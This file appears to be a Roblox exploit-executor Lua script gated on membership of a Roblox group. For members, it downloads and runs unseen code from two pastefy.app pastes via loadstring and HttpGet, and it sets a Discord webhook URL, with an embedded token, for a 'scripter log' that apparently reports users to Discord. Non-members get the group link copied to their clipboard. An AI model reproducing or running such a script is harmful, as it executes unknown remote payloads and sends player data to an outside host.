local id = 35655715
local p = game:GetService("Players").LocalPlayer
local g = game:GetService("StarterGui")

if p:IsInGroup(id) then
    loadstring(game:HttpGet("https://pastefy.app/Y9jXxmZU/raw"))()

    getgenv().Title = "<^>SCRIPTER LOG<^>"
    getgenv().ThumbnailUrl = "https://i.imgur.com/QmNN2Yg.png"
    getgenv().Color = 0x000000

    getgenv().FieldTitle = "Script Used:"
    getgenv().FieldText = "loadstring(game:HttpGet("https://raw.githubusercontent.com/MainTreeUhh/UniversalScript/main/Asterisk"))()"

    getgenv().Webhook = "https://discord.com/api/webhooks/1349705228806520883/Zb-nxossWJM1Iiove8G5Mg6AKqir-7SKvOfm83g2RWNY9W2vfDjk6eorkxjoQqKk2OkR"

    coroutine.wrap(function()
        loadstring(game:HttpGet("https://pastefy.app/5WvXJB5C/raw"))()
    end)()
else
    (setclipboard or toclipboard or setrbxclipboard)("https://www.roblox.com/groups/"..id)
    pcall(function() g:SetCore("ResetCoreGuiEnabled", true) end)

    local messages = {
        {"ACCESS DENIED", "JOIN THE GROUP TO USE THIS!"},
        {"GROUP LINK COPIED", "!~~!"}
    }

    for _, v in ipairs(messages) do
        pcall(function()
            g:SetCore("SendNotification", {Title = v[1], Text = v[2], Duration = 5})
        end)
        task.wait(0.01)
    end
end
